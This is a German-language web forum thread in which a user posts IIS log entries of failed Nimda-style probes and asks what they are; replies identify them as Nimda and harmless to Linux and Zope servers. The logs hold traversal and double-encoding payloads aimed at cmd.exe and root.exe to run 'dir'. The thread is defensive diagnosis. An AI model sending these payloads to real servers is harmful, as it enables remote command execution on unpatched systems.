|
webserver protokoll lesen???
kann mir jemand sagen wer oder was da versucht meinen webserver zu überreden (wozu zu überreden) ???????????????????
virus, händischer versuch einzudringen, ganz normal? 62.194.80.164: - - [06/Nov/2001:20:46:13 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:13 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2069 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:14 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2065 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:14 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2065 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:18 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1956 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:19 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1956 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:19 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2069 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:20 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:20 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:21 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:21 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:22 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:25 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:29 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:29 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" danke ... (-:fs) |
Schaut nach einem Besuch von Nimda aus. Ich habe solche Einträge auch tonnenweise in meinen Logs. Bei einem Linuxserver halt vergebene Liebesmüh :D
|
dann offenbar auch bei einem ZOPE server vergebliche liebesmüh :-)
(-:fs) |
habe dir ein mail geschickt...
mfg.morph.:tux: |
| Alle Zeitangaben in WEZ +2. Es ist jetzt 17:14 Uhr. |
Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
© 2009 FSL Verlag